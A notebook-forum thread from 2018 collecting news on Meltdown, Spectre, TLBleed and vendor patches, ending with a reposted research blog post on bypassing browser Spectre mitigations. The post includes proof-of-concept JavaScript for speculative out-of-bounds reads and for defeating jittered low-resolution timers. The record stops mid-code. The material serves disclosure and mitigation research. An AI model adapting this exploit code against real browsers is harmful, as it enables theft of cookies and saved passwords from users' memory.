CPU Vulnerabilities, Meltdown and Spectre, Kernel Page Table Isolation Patches, and more

Discussion in 'Hardware Components and Aftermarket Upgrades' started by hmscott, Jan 2, 2018.

  1. hmscott

    hmscott Notebook Nobel Laureate

    Reputations:
    4,650
    Messages:
    16,175
    Likes Received:
    19,884
    Trophy Points:
    931
    OpenBSD disables Intel’s hyper-threading over CPU data leak fears
    Cites risk of different security domains on one core as others hint at another bug drop

    By Simon Sharwood, APAC Editor 20 Jun 2018 at 07:32
    https://www.theregister.co.uk/2018/06/20/openbsd_disables_intels_hyperthreading/

    "OpenBSD has disabled Intel’s hyper-threading technology, citing security concerns – seemingly, Spectre-style concerns.

    As detailed in this mailing list post, OpenBSD maintainer Mark Kettenis wrote that “SMT (Simultaneous Multi Threading) implementations typically share TLBs and L1 caches between threads.

    “This can make cache timing attacks a lot easier and we strongly suspect that this will make several Spectre-class bugs exploitable.”

    So OpenBSD has decided to disable Intel CPU hyper-threading, with “a new hw.smt sysctl,” in order to avoid data potentially leaking from applications to other software via Spectre-like processor flaws.

    “For now this only works on Intel CPUs when running OpenBSD/amd64,” Kettenis wrote. “But we're planning to extend this feature to CPUs from other vendors and other hardware architectures.”

    Insane in the domain
    There’s not much more by way of explanation for the decision in Kettenis’ post, other than the observation that: “We really should not run different security domains on different processor threads of the same core.”

    There is, however, a further hint about the reason in this post from OpenBSD chap Philip Guenther, who committed a change to “clear the GPRs when entering the kernel from userspace so that user-controlled values can't take part in speculative execution in the kernel down paths that end up 'not taken' but that may cause user-visible effects (cache, etc).”

    That commit was accompanied by a request to disable Intel hyper-threading.

    We've also spotted this Seclists message mentioning OpenBSD's decision, and hinting a related disclosure coming on June 27. And this talk at Black Hat in August that promises to reveal how miscreants can extract encryption keys from application memory via hyper-threading and TLB data leaks.

    Specifically, that presentation, by Ben Gras, will cover a technique dubbed TLBleed that exploits hyper-threading to swipe sensitive data:

    Our TLBleed exploit successfully leaks a 256-bit EdDSA key from libgcrypt (used in e.g. GPG) with a 98% success rate after just a single observation of a signing operation on a co-resident hyper-thread and just 17 seconds of analysis time.

    We’ve asked Kettenis to offer more information, and Intel to comment, but neither had been in touch at the time of writing.

    Performance
    Kettenis’ post suggest disabling hyper-threading won’t be a big deal because “SMT doesn't necessarily have a positive effect on performance; it highly depends on the workload. In all likelihood it will actually slow down most workloads if you have a CPU with more than two cores.”

    He’s not wrong: unless code is written with hyper-threading in mind, the performance benefit isn’t enormous, and not a lot of code specifically takes advantage of the feature. Hyper-treading works by allowing one CPU core to run multiple threads at once, as opposed to one thread per core.

    Intel, however, markets hyper-threading as a distinct virtue: its CPU spec sheets always mention core and thread count.

    Hints of further Spectre-like security worries will therefore be most unwelcome to Chipzilla. The OpenBSD community was miffed by the steps taken to disclose Meltdown and Spectre design flaws – effectively freezing out a chunk of the BSD world from private collaborations on mitigations – and called for such revelations to be handled differently in future."

    Comments
     
  2. hmscott

    hmscott Notebook Nobel Laureate

    Reputations:
    4,650
    Messages:
    16,175
    Likes Received:
    19,884
    Trophy Points:
    931
    Oracle gets busy with Lazy FPU fix, adds more CPU Spectre-protectors
    Oracle Linux and VM get their innoculations

    By Richard Chirgwin 26 Jun 2018 at 04:58
    https://www.theregister.co.uk/2018/06/26/oracle_patches_lazy_fpu_and_spectre/

    "Oracle has released fixes for Spectre v3a, Spectre v4, and the “Lazy FPU” vulnerability.

    The two Spectre patches cover CVE-2018-3640 and CVE-2018-3640.

    As Oracle's director of security assurance Eric Maurice explained, the patches apply to both Oracle Linux and Oracle VM and the associated Intel microcode.

    The company was also busy on Friday with fixes for admins with systems that use its Ksplice no-reboot patches.

    The one everyone was waiting for patches Oracle Linux RHCK 7 against the Intel Lazy FPU issue, CVE-2018-3665. Oracle Linux 6 and Oracle Linux 7 got their Lazy FPU patches in a separate announcement.

    There's also a patch for Oracle Linux 6 and 7, to fix an IPSec denial-of-service, CVE-2017-16939.

    The company's also announced improved fixes for the Spectre v2 mitigations (Intel and AMD), again for Oracle Linux 6 and 7."

    Comments
     
  3. Papusan

    Papusan JOKEBOOKS = That sucks!! STAHP! Dont buy FILTH...

    Reputations:
    12,383
    Messages:
    18,517
    Likes Received:
    27,883
    Trophy Points:
    931
    Intel Releases "Spectre" Hardening Microcode Updates for "Ivy Bridge" thru "Westmere" Architectures
    Today, 10:49
    Intel today released the latest round of CPU micro-code updates for its processors, which expand support for Intel processor microarchitectures ranging all the way back to 1st generation Core "Westmere," and "Lynnfield," and including "Sandy Bridge" and "Ivy Bridge" along the way, at various stages of roll-out (beta, pre-production, and production). This update probably features hardening against "Spectre" variant 4, and perhaps even RSRR (rogue system register read) variant 3A, chronicled in CVE-2018-3640.

    https://www.intel.com/content/dam/www/public/us/en/documents/sa00115-microcode-update-guidance.pdf
     
    Last edited: Jul 2, 2018
    Robbo99999, hmscott and Vasudev like this.
  4. hmscott

    hmscott Notebook Nobel Laureate

    Reputations:
    4,650
    Messages:
    16,175
    Likes Received:
    19,884
    Trophy Points:
    931
    Researchers find a new side-channel attack against a performance-enhancing feature in Intel CPUs - Intel won't fix it.
    By Liam Tung | June 26, 2018 -- 12:39 GMT (05:39 PDT)
    https://www.zdnet.com/article/tlble...aw-to-surface-but-dont-expect-it-to-be-fixed/

    "Intel won't be patching a newly revealed side-channel vulnerability in its CPUs, even though it could be used to leak encryption keys for signing a message.

    The flaw, which will be presented at the Black Hat USA 2018 conference, is why OpenBSD recently decided to disable hyperthreading on Intel CPUs.

    The OpenBSD project's chief, Theo de Raadt, said he dropped support for the feature after viewing the paper from researchers at the Systems and Network Security Group at Vrije Universiteit Amsterdam.

    The Register reported on Friday that the paper details an attack on Intel's Hyper-Threading technology to reliably extract a 256-bit EdDSA encryption key used for cryptographically signing data.

    The researchers argue that their attack, dubbed TLBleed, is able to leak the keys from another program in no less than 98 percent of tests, depending on the Intel CPU architecture. The leak happens when the key is being used to sign data.

    As the attack relies on Intel's Hyper-Threading, this side-channel flaw differs from Spectre and Meltdown, which exploit speculative execution. Intel's Hyper-Threading technology is available on Intel Core, Core vPro, Core M, and Xeon processors.

    In a publicly available summary, the researchers note that the side-channel attack leaks information from the Translation Lookaside Buffer (TLB), a special type of memory cache that stores recent translations that map virtual to physical memory addresses.

    If Hyper-Threading is enabled, a single core can execute multiple threads simultaneously for performance gains, but that core also shares the same memory caches and TLB.

    The attack makes it possible for one thread to see how another accesses the CPU through TLB and use this information to work out secrets from another program stored in shared RAM.

    "Our TLBleed exploit successfully leaks a 256-bit EdDSA key from cryptographic signing code, which would be safe from cache attacks with cache isolation turned on, but would no longer be safe with TLBleed. We achieve a 98 percent success rate after just a single observation of signing operation on a co-resident hyperthread and just 17 seconds of analysis time."

    The researchers say their attack is able to extract this key while a program is signing a message with the libgcrypt cryptographic library.

    However, to exploit the flaw, an attacker would already need to have malware running on a target system or be logged in. But the vulnerability could pose a threat to virtual machines on a public cloud, which could be exploited from another instance on the same machine.

    Intel appears unlikely to patch the bug and did not award the researchers payment under its side-channel bug bounty. The company has said its cache attack protections are sufficient to block TLBleed attacks.

    However, Ban Gras, one of the researchers behind TLBleed, said in a tweet that the attack shows that cache side-channel protections, such as cash isolation, are not enough.

    Intel told ZDNet that it had been made aware of the Vrije Universiteit research and TLBleed, which it stressed is unrelated to Spectre or Meltdown.

    "Research on side-channel analysis methods often focuses on manipulating and measuring the characteristics (eg, timing) of shared hardware resources. These measurements can potentially allow researchers to extract information about the software and related data," Intel said in a statement.

    "Software or software libraries such as Intel Integrated Performance Primitives Cryptography version U3.1, written to ensure constant execution time and data independent cache traces, should be immune to TLBleed."
    PREVIOUS AND RELATED COVERAGE
    Another day, another Intel CPU security hole: Lazy State

    Intel has announced that there's yet another CPU security bug in its Core-based microprocessors.

    Meltdown-Spectre: Oracle's critical patch update offers fixes against CPU attacks

    The enterprise software giant is working on Spectre fixes for Solaris on Sparc V9.

    New Spectre variant 4: Our patches cause up to 8% performance hit, warns Intel

    Intel's Spectre variant 4 patch will be off by default, but users who turn it on are likely to see slower performance.

    Spectre chip security vulnerability strikes again; patches incoming

    A Google developer discovered a new way that a 'Spectre'-style check can be used to attack any computer running any operating system.

    Are 8 new 'Spectre-class' flaws in Intel CPUs about to be exposed?

    Reports are emerging of eight new 'Spectre-class' security CPU vulnerabilities.

    Ex-Intel security expert: This new Spectre attack can even reveal firmware secrets

    A new variant of Spectre can expose the contents of memory that normally can't be accessed by the OS kernel.

    Microsoft to Windows users: Here are new critical Intel security updates for Spectre v2

    Microsoft releases new Windows updates to address the Spectre variant 2 flaw affecting Intel chips.

    Windows 10 on AMD? This new update plus Microsoft's patch block Spectre attacks

    AMD has released microcode updates for Spectre variant 2 that require Microsoft's latest Windows 10 patch.

    Intel: We now won't ever patch Spectre variant 2 flaw in these chips

    A handful of CPU families that Intel was due to patch will now forever remain vulnerable.

    Windows 7 Meltdown patch opens worse vulnerability: Install March updates now

    Microsoft's Meltdown fix opened a gaping hole in Windows 7 security, warns researcher.

    Intel's new Spectre fix: Skylake, Kaby Lake, Coffee Lake chips get stable microcode

    Intel makes progress on reissuing stable microcode updates against the Spectre attack.

    Got an old PC? Find out whether you will get Intel's latest Spectre patch (TechRepublic)

    Intel has listed a range of CPUs released between 2007 and 2011 that will not receive a firmware update to help guard against Spectre-related exploits.

    Class-action suits over Intel Spectre, Meltdown flaws surge (CNET)

    Since the beginning of 2018, the number of cases has risen from three to 32.
     
    Last edited: Jul 2, 2018
    Vasudev likes this.
  5. hmscott

    hmscott Notebook Nobel Laureate

    Reputations:
    4,650
    Messages:
    16,175
    Likes Received:
    19,884
    Trophy Points:
    931
    Rowhammer returns, Spectre fix unfixed, Wireguard makes a new friend, and much more
    And NSA can't stop slurping your phone records
    By Shaun Nichols in San Francisco 30 Jun 2018 at 07:01
    https://www.theregister.co.uk/2018/06/30/security_roundup/

    "...
    Spectre patches may need a patch
    When is a fix not a fix? When it's an attempt patch up the Spectre vulnerability, apparently.

    Researchers Noam Hadad and Jonathan Afek of Aleph Security said this week that they had devised a way to work around some of the measures browser vendors have used to mitigate the vulnerability.

    It turns out the data-timing tricks browsers use to help prevent exploits can be overcome, provided the attackers don't mind a little performance hit.

    "In our research we were able to overcome the cache access timing specific mitigations. Although these mitigations cause a serious slowdown in our POC, they are not effective in preventing this attack," the duo write.

    "These mitigations also have some negative performance implications and are hurting the functionality of some legitimate JavaScript web application use-cases."

    Overcoming (some) Spectre browser mitigations

    By Noam Hadad & Jonathan Afek (@JonathanAfek)
    June 26, 2018
    https://alephsecurity.com/2018/06/26/spectre-browser-query-cache/
    Spectre is a CPU vulnerability which allows an attacker in certain scenarios to read “secret” data on the victim’s machine. The vulnerability was first published by Google Project Zero and by various researchers.

    One of the variants of Spectre (variant 1) is relevant in browsers executing malicious Javascript code in JIT engines. When a victim visits an attacker controlled website and malicious Javascript is served on the site, it can potentially read the all the mapped memory space of the browser process. To exploit this vulnerability the attacker code has to access “secret” memory in a speculatively executed Javascript JIT code that would have been otherwise inaccessible as it contains secret data. In a simple Javascript Spectre exploit this would be out-of-bounds index access of a Javascript array. Still, in the speculative branch, some memory (Javascript variable) has to be accessed and therefore be inserted into the CPU cache based on the “secret” value - different “secret” values will cause different variables to be inserted into the CPU cache. Then, outside the speculative branch we measure the access time to the different Javascript variables to query whether they are CPU cached or not. If we can understand which of them was in the CPU cache, we can conclude what the “secret” value was. In a browser environment, the “secret” values in the same process memory can be HttpOnly cookies, cookies of other origins, saved passwords or any other browser “secret” data or per-domain “secret” data.

    Because of this vulnerability discovery, browser vendors implemented different mitigations for this vulnerability. Some of them are meant to disable known methods for querying CPU cache state of memory slots (Javascript variables). These mitigations include the resolution reduction of the Javascript timer performance.now() and adding jitter to its results.

    In our research we were able to overcome the cache access timing specific mitigations. Altough these mitigations cause a serious slowdown in our POC, they are not effective in preventing this attack. These mitigations also have some negative performance implications and are hurting the functionality of some legitimate Javascript web application use-cases.

    In this blog post we will first breifly talk about CPU caches in general and how they work. Then, we will briefly discuss browser Javascript JIT engines with focus on V8 and Chrome/Chromium. Next, we will show how to implement the original exploit before any Spectre specific mitigations. After that, we will introduce the known implemented Spectre mitigations in the different browsers. Next, we will show how we beat the timing specific mitigations step by step. Lastly, we will examine the implications of this research and possible further research to be done.

    Here is the POC code.

    CPU Cache
    In this section we will focus only on the LLC L3 CPU cache for simplicity. This is good for understanding the concepts of the POC presented in this blog post. The major timing difference we expect to see in memory access time is between RAM fetches and CPU cached memory (any level of cache). Any memory that is CPU cached in any level cache is expected to also reside in the L3 LLC cache. We assume 64-bit browser processes with 48-bit addresses. We assume that the CPU uses 4KB pages and that each virtual memory address is inside a virtual memory page which is mapped to a physical memory page. This means that the lower 12 bits of the virtual address of each memory address are the same as the lower 12 bits of the physical address of that referenced memory. We assume that CPU cache is split into X different cache sets and that each of them holds an LRU list of Y cache-lines each of them is of size 64 bytes (512 bits). This means the lower 6 bits of each memory address is the offset inside the cache-line of the address.

    Physical address: [b18-b47: TAG, b6-b17: Cache set index, b0-b5: Cache line offset]
    |
    ---------------------------------------------------------...
    | | |
    | | |
    - Cache set0 - - Cache set1 - - Cache set2 -
    ---- LRU ----- ----- LRU ---- ----- LRU ----
    |Cache line 0| |Cache line 0| |Cache line 0|
    | TAG : DATA | | TAG : DATA | | TAG : DATA |
    -------------- -------------- --------------
    |Cache line 1| |Cache line 1| |Cache line 1|
    | TAG : DATA | | TAG : DATA | | TAG : DATA |
    -------------- -------------- --------------
    |Cache line 2| |Cache line 2| |Cache line 2|
    | TAG : DATA | | TAG : DATA | | TAG : DATA |
    -------------- -------------- --------------
    . . .
    . . .
    . . .

    In the above graph you can see that for each physical address, the middle bits (6-17) determine the cache set the address belongs to. Whenever data at a certain address is accessed, the CPU needs to first determine whether the data is in the CPU cache or not. In order to do that the address is examined. By examining the cache set index bits (6-17, in our example) the relevant cache set is determined. Each combination of cache set index bits is mapped exclusively to a specific cache set. Each cache set is an LRU list of cache lines each holding a TAG and 512 bits of data. The TAG bits of the given address are then compared against all the TAGs currently in the cache set. If there is a match then the data in the cache line is returned to the CPU and the cache line is marked as the most recently used in the set. If there is no match then the least recently used cache line is removed from the set and the data is fetched from the RAM into a new cache line in the set and to the CPU.

    The above bit ranges in the address are assumed in the POC, and we will still refer to it later in the post but it works well with even different bit ranges used for the different roles. What we do rely on is that bits 10 and 11 are part of the cache set index bits.

    For more information on how CPU caches work please refer to this presentation and toWikipedia.

    Javascript engines and V8
    Before getting to exploiting Spectre in a browser environment we first need to understand how Javascript engines and JIT engines work. For our research we examined V8 specifically which is Chrome’s open source Javascript engine.

    V8 first compiles each Javascript function it encounters into bytecode and executes the bytecode with an interpreter. Then each time the function executes the function parameter types are recorded into the function’s feedback vector. After the function executes many times then the TurboFan JIT compiler kicks in and compiles the function code into CPU specific assembly code optimized for the input parameter types recorded in the feedback vector. The compiled function first checks that the input types are indeed of the assumed types that were recorded in the feedback vector. If not, the execution falls back to bytecode execution. If there is a match then the function continues. Each Javascript object representation holds a pointer as the first member of the object to the Hidden Class of the specific object type which defines the object’s layout. The type comparison is done by comparing this pointer to a known value for the classes recorded in the feedback vector.

    Let’s take the following Javascript code for example (from the original Spectre papaer):

    if (index < simpleByteArray.length) {
    index = simpleByteArray[index | 0];
    index = (((index * TABLE1_STRIDE)|0) & (TABLE1_BYTES-1))|0;
    localJunk ^= probeTable[index|0]|0;
    }

    Which was compiled with TurboFan to:

    1 cmpl r15,[rbp-0xe0] ;Compare index (r15) against simpleByteArray.length
    2 jnc 0x24dd099bb870 ;If index >= length, branch to instruction after movq below
    3 REX.W leaq rsi,[r12+rdx*1] ;Set rsi=r12+rdx=addr of first byte in simpleByteArray
    4 movzxbl rsi,[rsi+r15*1] ;Read byte from address rsi+r15 (= base address+index)
    5 shll rsi,12 ;Multiply rsi by 4096 by shifting left 12 bits}\%\
    6 andl rsi,0x1ffffff ;AND reassures JIT that next operation is in-bounds
    7 movzxbl rsi,[rsi+r8*1] ;Read from probeTable
    8 xorl rsi,rdi ;XOR the read result onto localJunk
    9 REX.W movq rdi,rsi ;Copy localJunk into rdi

    In this case, for a successful attack, [rbp-0xe0] - (simpleByteArray.length) should be not in the CPU cache so that the condition of the conditional jump at line 2 could not be determined right away and the CPU would have to guess the result (speculative execution). The attack code was designed to execute the code above in a function and execute the function many times with an index which is in-bounds of the array. That way, when the code passes a large out-of-bounds index, the speculative execution guesses it is actually in-bounds. At line 4, the code reads an out-of-bounds value from simpleByteArray[index] into an index inside the speculatively falsely executed branch, and then in that same branch it reads from probeTable[index]. After a while the CPU fetches simpleByteArray.length from RAM, understands it falsely executed the branch because index is out-of-bounds and doesn’t commit any of the operations performed in the branch. One effect of the branch execution that the CPU can’t reverse is the CPU cache state. If probeTable was completely out of the CPU cache beforehand, after executing this function only the slot probeTable[index] should be in the CPU cache. Using the code below, we can query the cache state of all the probeTable slots and understand which one of them was cached and therefore conclude what index was inside the speculatively executed branch which is an out-of-bounds memory location from simpleByteArray.

    for (var i = 0; i < PROBE_TABLE_SIZE; i += TABLE1_STRIDE) {
    var before = performance.now();
    tmp += probeTable; //add to a global var
    var after = performance.now();
    if (after - before < CACHE_HIT_THRESHOLD) {
    return i; //This is the index from the speculative execution before
    }
    }

    Using different out-of-bounds indices iteratively, the whole browser process memory could be read and the attacker could get sensitive information saved in that process, such as cookies for other domains, saved passwords and any other user data saved in the process memory.

    It should be noted that other techniques for timing the probeTable access existed before Browsers implemented the Spectre mitigations, some of them more accurate than using performance.now(). Here is a good overview of such techniques.

    For a full implementation of the Javascript Spectre attack for unpatched browsers please see here.

    Spectre browser mitigations
    All the major browser vendors implemented Spectre mitigations to prevent this attack.

    V8 mitigations relevant for Chrome and Chromium.

    Chrome mitigations relevant for Chrome.

    Chromium mitigations relevant for Chromium.

    Firefox mitigations relevant for Firefox.

    Microsoft mitigations relevant for Internet Explorer and Microsoft Edge.

    Webkit mitigations relevant for Safari.

    The main relevant mitigations are:
    1. Index masking of array objects data access. This means that before using the supplied index to access an array-like object, the index is AND’d with a mask that is based on the length of the array. The CPU does not guess the output of AND operations before it has both sides so no speculation could be done on the mask and all reads should in-bounds with this mitigation. We should note that the mask is for the next power of 2 above the array length in most implementations, so small out-of-bounds access might still be possible, albeit very challenging. If the mask is already retrieved from RAM then most probably the array length is already in the CPU cache, as they are usually very close (could be on the same cache-line). In addition, the RAM fetch request for the length was probably initiated first, so would probably complete first and the speculative execution would terminate before the actual array access.

    2. Site-Isolation for resources per domain in separate processes. That means that Javascript code running in the context of domain X will not have the cookies of domain Y in the same memory space.

    3. Disabling support for SharedArrayBuffer that can be used to implement high precision timers to time data access and query whether it was CPU cached or not.

    4. Reducing resolution of response of performance.now(), so that it would be hard to use it for timing data access given the very fast CPU cache and/or RAM access times.

    5. Adding jitter to the response of performance.now() so it would be even harder to time data access. It should be noted that where implemented, it still needs to keep the following properties: if t1 > t2 then performance.now()[t1] >= performance.now()[t2] and also if current time is exactly t1 then \|performance.now()[t1] - t1\| <= fixed-small-max-jitter-value.
    The exact performance.now() implementation for Chromium including lower resolution and jitter can be seen here trough the functions “Performance::now()”, “Performance::MonotonicTimeToDOMHighResTimeStamp()” and “TimeClamper::ClampTimeResolution()” in here.

    Overcoming the index masking mitigation
    This mitigation prevents us from accessing out-of-bounds data from speculative execution branches using out-of-bounds indices for array-like objects.

    Let’s consider another approach with the following Javascript code:

    var probeBuf = new ArrayBuffer(256);
    var probeArr = new Uint8Array(probeBuf);

    function spectre(obj) {
    var index = obj.m53 % 256;
    probeArr[index] = 100;
    }

    function LargeClass() {
    this.m1 = 1;
    this.m2 = 1;
    this.m3 = 1;
    this.m4 = 1;
    this.m5 = 1;
    this.m6 = 1;
    this.m7 = 1;
    this.m8 = 1;
    this.m9 = 1;
    this.m10 = 1;
    this.m11 = 1;
    this.m12 = 1;
    this.m13 = 1;
    this.m14 = 1;
    this.m15 = 1;
    this.m16 = 1;
    this.m17 = 1;
    this.m18 = 1;
    this.m19 = 1;
    this.m20 = 1;
    this.m21 = 1;
    this.m22 = 1;
    this.m23 = 1;
    this.m24 = 1;
    this.m25 = 1;
    this.m26 = 1;
    this.m27 = 1;
    this.m28 = 1;
    this.m29 = 1;
    this.m30 = 1;
    this.m31 = 1;
    this.m32 = 1;
    this.m33 = 1;
    this.m34 = 1;
    this.m35 = 1;
    this.m36 = 1;
    this.m37 = 1;
    this.m38 = 1;
    this.m39 = 1;
    this.m40 = 1;
    this.m41 = 1;
    this.m42 = 1;
    this.m43 = 1;
    this.m44 = 1;
    this.m45 = 1;
    this.m46 = 1;
    this.m47 = 1;
    this.m48 = 1;
    this.m49 = 1;
    this.m50 = 1;
    this.m51 = 1;
    this.m52 = 1;
    this.m53 = 1;
    }

    function SmallClass() {
    this.m1 = 1;
    this.m2 = 1;
    this.m3 = 1;
    this.m4 = 1;
    this.m53 = 1;
    }

    var largeObj = new LargeClass();
    var smallObj = new SmallClass();

    for (var i = 0; i < 4000000; i++) {
    spectre(largeObj);
    }

    spectre(smallObj); // Will speculatively treat the object as LargeClass at first

    for (var i = 0; i < 256; i++) {
    var before = performance.now();
    probeArr = 100;
    var after = performance.now();
    if (after - before < 200) {
    //None of the probeArray slots are in the cache from before since it was never accessed in the code.
    //The first slot that is detected to be in the CPU cache because of the fast access time is
    //then used to determine the value of the byte at offest 0x1bb from the beginning of input object of the spectre() function.
    //The slot is referenced inside the function spectre() in a speculatively executed branch and by the fast
    //access time we can conclude the slot that is in the CPU cache and therefore the "secret" data that was used to
    //set the slot index inside the function spectre().
    //The value of the memory at offest 0x1bb from the beginning of input object to the spectre() function is the current value of i.
    //Log the result and exit the loop.
    break;
    }
    }
    console.log(localJunk);

    TurboFan compiles the function spectre() into:
    ...

    //fetch input param (obj) of the function to rax
    0x2b40db1d21ea 6a 488b4510 REX.W movq rax,[rbp+0x10]

    //make sure that param is a pointer (lower bit is 1 in V8 representation)
    0x2b40db1d21ee 6e a801 test al,0x1
    0x2b40db1d21f0 70 0f8412010000 jz 0x2b40db1d2308 <+0x188>

    //validate that the param is of type LargeClass (hidden class pointer compare)
    0x2b40db1d21f6 76 48bbf1e5d8e86b000000 REX.W movq rbx,0x6be8d8e5f1 ;; object: 0x006be8d8e5f1 <Map(HOLEY_ELEMENTS)>
    0x2b40db1d2200 80 483958ff REX.W cmpq [rax-0x1],rbx
    0x2b40db1d2204 84 0f8503010000 jnz 0x2b40db1d230d <+0x18d> <--speculative execution here - make sure hidden class pointer is not in cache so branch speculation will continue as if it is a LargeClass object

    //fetch member at offset 0x1bb from the beginning of the input object into rbx (this is the offset of m53 for LargeClass objects)
    0x2b40db1d220a 8a 8b98bb010000 movl rbx,[rax+0x1bb] <--access out-of-bounds data here if obj is of type SmallClass, need to make sure offset 0x1bb from the input object is in the CPU cache, so we can continue with the result before the hidden class pointer is fetched from RAM and speculative execution is stopped

    //sanity make sure that rbx (obj.m53) is indeed a 32 bit unsigned integer
    0x2b40db1d2210 90 49ba0000000001000000 REX.W movq r10,0x100000000
    0x2b40db1d221a 9a 4c3bd3 REX.W cmpq r10,rbx
    0x2b40db1d221d 9d 7310 jnc 0x2b40db1d222f <+0xaf>
    0x2b40db1d221f 9f 48ba0000000001000000 REX.W movq rdx,0x100000000
    0x2b40db1d2229 a9 e8329ae8ff call 0x2b40db05bc60 (Abort) ;; code: Builtin::Abort
    0x2b40db1d222e ae cc int3l

    //make sure rbx (obj.m53) >= 0
    0x2b40db1d222f af 83fb00 cmpl rbx,0x0
    0x2b40db1d2232 b2 0f8c9d000000 jl 0x2b40db1d22d5 <+0x155>

    //extract only the lower byte of obj.m53 (% 256)
    0x2b40db1d2238 b8 0fb6db movzxbl rbx,rbx

    //sanity make sure that rbx (obj.m53 % 256) is indeed a 32 bit unsigned integer
    0x2b40db1d223b bb 49ba0000000001000000 REX.W movq r10,0x100000000
    0x2b40db1d2245 c5 4c3bd3 REX.W cmpq r10,rbx
    0x2b40db1d2248 c8 7310 jnc 0x2b40db1d225a <+0xda>
    0x2b40db1d224a ca 48ba0000000001000000 REX.W movq rdx,0x100000000
    0x2b40db1d2254 d4 e8079ae8ff call 0x2b40db05bc60 (Abort) ;; code: Builtin::Abort
    0x2b40db1d2259 d9 cc int3l

    //make sure rbx (obj.m53 % 256) is lower than 256 as it will be used as an index for an array of that size
    0x2b40db1d225a da 81fb00010000 cmpl rbx,0x100
    0x2b40db1d2260 e0 0f83ac000000 jnc 0x2b40db1d2312 <+0x192>

    ...

    //move (obj.m53 % 256) to rax
    0x2b40db1d227a fa 8bc3 movl rax,rbx

    //sanity make sure that rax (obj.m53 % 256) is indeed a 32 bit unsigned integer
    0x2b40db1d227c fc 49ba0000000001000000 REX.W movq r10,0x100000000
    0x2b40db1d2286 106 4c3bd0 REX.W cmpq r10,rax
    0x2b40db1d2289 109 7310 jnc 0x2b40db1d229b <+0x11b>
    0x2b40db1d228b 10b 48ba0000000001000000 REX.W movq rdx,0x100000000
    0x2b40db1d2295 115 e8c699e8ff call 0x2b40db05bc60 (Abort) ;; code: Builtin::Abort
    0x2b40db1d229a 11a cc int3l

    //move the probeArr object pointer to rbx
    0x2b40db1d229b 11b 48bb700f05aa54560000 REX.W movq rbx,0x5654aa050f70

    //assign 100 to probeArr[obj.m53 % 256]
    0x2b40db1d22a5 125 c6041864 movb [rax+rbx*1],0x64 <--this inserts the relevant entry of probeArr into the CPU cache based on the secret value inside the speculative execution, so we can query the probeArr later to see which entry is in the CPU cache

    ...


    In this code we have the function spectre() which we call many times. It receives a single parameter and since we always call it with an object of type LargeClass then it gets logged in the function’s feedback vector and TurboFan then compiles the function for handling this type specifically.

    In the beginning of the function, the parameter’s hidden class pointer (parameter type) is compared against the known fixed static pointer of the LargeClass type hidden class. If there is a match execution continues and if not then TurboFan execution stops and an unoptimized execution of the function happens.

    If the parameter hidden class pointer is not CPU cached then if we pass an object of type SmallClass then speculative execution can continue until the CPU realizes it is the wrong hidden class. Inside the speculative branch a large offset from the beginning of the object is queried (out-of-bounds for objects of type SmallClass).

    This out-of-bounds data is then used as an index for the probe array and the Spectre exploit continues to timing accesses to the different probe array slots to understand which one is in the CPU cache.

    This approach might not get us very far from the object since from a certain object size the layout of the object is different in the memory and this method is no longer applicable. Saying that, it is still an out-of-bounds memory read.

    Another note is that before executing the spectre() function we must make sure that the hidden class pointer of the object passed to the function is not cached so that speculative execution will start, that the secret data queried is CPU cached (for example loading a new resource from a domain so the cookie would be loaded into the CPU cache) so that execution could continue to accessing the probe array before the speculative execution terminates, and that the probe array is all out of CPU cache so that only one entry will be in the CPU cache after the function call.

    In a real exploit the probe array slots that are used will be further apart to prevent cache pre-fetching effects to insert multiple slots into the CPU cache at once.

    This code is not presented in the POC code since it is harder to show the result with this technique, as Javascript doesn’t allow access to the secret data, and it’s impossible to compare it with the results we got from the Spectre exploit. The success of the exploit can be manually examined by attaching a debugger to the process right after executing the exploit and dumping the process memory.

    A few notes about the Site-isolation mitigation
    This mitigation is very effective, but potentially very challenging to implement correctly: it can have performance and functionality issues, and developers must actively maintain different data types in the correct process.

    Another issue is that per-domain data that is not meant to be accessed by Javascript, such as HttpOnly cookies, still has the potential of being exposed.

    Overcoming the data timing mitigations with a low resolution and jittered timer
    The following techniques explained here are implemented in our POC.

    We also implemented a very precise timer for Chromium to debug our code with. The patch for this timer is also available here.

    Here we will focus on how to detect cache effects from speculative branches with low resolution and jittered timers.

    Let’s consider the following code:

    lastTick = performance.now();
    while (lastTick == (curTick = performance.now()));

    The code above executes a busy loop until exactly the time in which we hit a new tick in performance.now(). (performance.now() returns the same time exactly between low resolution jittered ticks)

    Now let’s add to it some code that executes exactly when the clock ticked:

    lastTick = performance.now();
    while (lastTick == (curTick = performance.now()));

    for (var i = 0; i < ITER_COUNT; i++) {
    globalVar++;
    }

    globalVar = probeArr[index];

    if (performance.now() == curTick) {
    //The access to probeArr[index] is a cache hit
    } else {
    //The access to probeArr[index] is a cache miss
    }

    If we had no jitter and performance.now() was a small constant time execution function, we could compute the time it takes to execute globalVar++ for a specific processor. Then, we would ajust the value of ITER_COUNT so that the next performance.now() after the probeArr[index] access will get us to the next tick if we have a cache miss, and keep us in the current tick for a cache hit.

    time:
    --------------------------------------------------------------------------
    | | |
    | | |--------------|--------------|
    | | |-----------| | |
    | | |probeArr | |probeArr |
    | | |access | |access |
    | |---------|------------|cache | |cache |
    | |wait for |ITER_COUNT |hit | |miss |
    | |tick |busy loop | | | |
    --------------------------------------------------------------------------
    tick | tick | tick |
    performance.now() performance.now() performance.now()

    This method works fine if performance.now() executes in a constant time and there is no jitter - but that isn’t the case with the current Spectre mitigations. To overcome this, we can first change the size of the probe array to have only 2 slots, one for bit value 0 and one for bit value 1, and query the out-of-bounds data bit after bit. We can then query the probe array for each secret bit multiple times, so that on average we get the true result for that bit.

    This method could take an unreasonable amount of time to execute for each bit, due to performance.now() execution time overhead and timer jitter noise.

    To solve this, we needed an approach which amplifies the cache miss/hit difference. To do that we wanted to have many cache misses or hits for each queried bit. We wanted to have many probe array slots for each queried bit cached or uncached. This can be achived by executing the speculative execution function for each bit multiple times and each time inserting a new slot of the probe array to the CPU cache. Then to retrieve the secret bit we can execute code such as the following:

    lastTick = performance.now();
    while (lastTick == (curTick = performance.now())); lastTick = curTick;

    for (var i = 0; i < SLOT_COUNT; i++) {
    globalVar += probeArrBitValueZero;
    }

    var zeroCount = 0;

    while (performance.now() == curTick) {
    zeroCount++;
    }

    lastTick = performance.now();
    while (lastTick == (curTick = performance.now())); lastTick = curTick;

    for (var i = 0; i < SLOT_COUNT; i++) {
    globalVar += probeArrBitValueOne;
    }

    var oneCount = 0;

    while (performance.now() == curTick) {
    oneCount++;
    }

    if (oneCount > zeroCount) {
